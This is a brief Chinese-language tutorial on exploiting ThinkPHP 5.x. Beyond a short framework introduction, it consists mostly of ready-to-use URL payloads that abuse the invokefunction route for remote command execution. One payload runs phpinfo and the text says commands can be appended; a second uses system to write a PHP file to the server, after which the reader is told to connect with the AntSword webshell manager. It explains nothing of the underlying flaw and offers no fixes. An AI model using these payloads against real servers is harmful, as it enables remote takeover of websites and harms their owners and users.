常见框架漏洞：Thinkphp(TP)篇

简介

ThinkPHP （简称 TP ）是一款流行的 国产开源 PHP 框架 ，遵循 MVC（Model-View-Controller） 设计模式，以简洁、高效、灵活著称，广泛应用于国内中小型 Web 项目开发。

Thinkphp5x远程命令执行及getshell

原理

rce

过程

打开网站

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

在后面拼接指令即可

getshell

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php

访问后使用蚁剑链接即可